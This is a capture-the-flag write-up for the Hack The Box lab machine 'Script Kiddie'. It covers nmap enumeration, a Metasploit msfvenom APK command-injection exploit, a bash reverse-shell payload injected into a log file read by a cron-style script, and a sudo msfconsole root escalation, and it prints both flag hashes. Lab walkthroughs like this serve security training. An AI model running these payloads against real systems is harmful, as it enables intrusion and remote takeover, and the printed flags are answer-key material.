Script kiddie Writeup Hackthebox/Htb

                    



SCRIPT KIDDIE 

Enumeration;                    

Nmap

 PORT   STATE SERVICE VERSION  
 22/tcp  open ssh   OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |  3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)  
 |  256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)  
 |_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)  
 5000/tcp open http  Werkzeug httpd 0.16.1 (Python 3.8.5)  
 |_http-title: k1d'5 h4ck3r t00l5  
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  

 Usual Port 80 is Not there so port 5000 is our Entry point lets check:)

Here is the  we view 10.10.10.226:5000 


Exploitation

after some google search this is vulnerable to

Rapid7 Metasploit Framework msfvenom APK Template Command Injection check it

its prety easy Exploit Before use this module Update your Metasploit

msfupdate ----> use this command

STEPS:


1:  sudo msfconsole  
2:  use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection  
3:  set lhost 10.10.14.xx  
4:  set lport 9001  
5:  set rhost 10.10.10.226  
6:  set rport 5000  
7:  exploit  

mv /root/.msf4/local/msf.apk . move apk file to current directory

Upload msf.apk in 10.10.10.26:5000

Make Sure Change the Os to  android 

USER FLAG

 BOOOM!! We get reverse shell lol its peice of cake

 kid@scriptkiddie:~$ cd /  
 cd /  
 kid@scriptkiddie:/$ cd home  
 cd home  
 kid@scriptkiddie:/home$ ls  
 ls  
 kid pwn  
 kid@scriptkiddie:/home$ cd kid  
 cd kid  
 kid@scriptkiddie:~$ cat user.txt  
 cat user.txt  
 0e4b318e4bd0405bc1ecbd22db500867  
 kid@scriptkiddie:~$   

HORIZONTOL PRIVILLEGE ESCALATION

 

 kid@scriptkiddie:/home/pwn$ ls  
 ls  
 recon scanlosers.sh  
 kid@scriptkiddie:/home/pwn$ cat scanlosers.sh  
 cat scanlosers.sh  
 #!/bin/bash  
  log=/home/kid/logs/hackers  
 cd /home/pwn/  
 cat $log | cut -d' ' -f3- | sort -u | while read ip; do  
   sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &  
 done  
 if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi  

 

move 'pwn' user cat scanlosers.sh file it interstring  bash script

lets move to the log in kid directory 

copy this simple command :)

 

 echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.XX/1234 0>&1’ #” >> hackers  

Be Sure Change IP And start listen on local machine

some times this not work so try 4 or 5 times

Yep!! We got Pwn User


 

ROOT FLAG

 Copy This Command :)

1:  sudo -l  
2:  sudo msfconsole /bin/bash -p  
3:  id  
4:  cat root.txt  
5:  f5482d18d0acd025b5e86f11d568fd83  

 

 

Post a Comment

أحدث أقدم

Smartphones

Post ADS 1

Advertisement

Post ADS 1